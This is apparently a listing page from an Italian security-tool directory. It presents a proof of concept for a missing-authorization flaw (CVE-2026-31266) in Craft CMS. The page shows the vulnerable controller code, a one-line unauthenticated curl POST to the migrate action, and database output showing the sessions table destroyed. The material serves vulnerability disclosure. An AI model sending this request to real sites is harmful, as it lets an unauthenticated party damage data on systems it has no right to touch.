Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Craftcms-PoC-CVE-2026-31266 — Ricerca sulla sicurezza del meccanismo di autenticazione di Craft CMS | Kitploit
Strumenti/GitHubGitHub/0xrixet/craftcms-poc-cve-2026-31266
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazione
GitHub0xrixet/craftcms-poc-cve-2026-31266

Craftcms-PoC-CVE-2026-31266

Ricerca sulla sicurezza del meccanismo di autenticazione di Craft CMS

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
33 mesi faNon ancora revisionato

CVE-2026-31266 - Craft CMS Autorizzazione Mancante

Informazioni CVE

CampoValore
CVE IDCVE-2026-31266
FornitorePixel & Tonic
ProdottoCraft CMS
Versioni Affette<= 5.9.5
CWECWE-862 (Autorizzazione Mancante)
CVSS7.3 (Alto)
Ricercatore di Sicurezza0xRIXET

Contenuto delle Prove

  • screenshots/ - Dimostrazioni Proof of Concept

Vulnerabilità

  • Tipo: Autorizzazione Mancante
  • Impatto: Bypass dell'Autenticazione
  • Fornitore: Craft CMS
  • Stato: CVE-2026-31266

Codice Vulnerabile

File: src/controllers/AppController.php

Righe 65-68:

root@kitploit:~
protected array|bool|int $allowAnonymous = [
    'migrate' => self::ALLOW_ANONYMOUS_LIVE | self::ALLOW_ANONYMOUS_OFFLINE,
];

Proof of Concept

root@kitploit:~
# With allowAdminChanges=false
curl -X POST "http://target/actions/app/migrate"

Prova

Prima dell'Attacco:

root@kitploit:~
mysql> SELECT COUNT(*) FROM sessions;
+----------+
| COUNT(*) |
+----------+
|        0 |
+----------+

Dopo l'Attacco:

root@kitploit:~
mysql> SELECT COUNT(*) FROM sessions;
ERROR 1146 (42S02): Table 'sessions' doesn't exist

Riferimenti

  • Craft CMS Repository
  • Documentazione sulla Sicurezza di Craft
  • NVD Entry

Contatti

  • Ricercatore di Sicurezza: 0xRIXET | Mohammed Al-shehri
  • Twitter | X : @0xRIXET
  • Email: [email protected]
Scarica lo strumento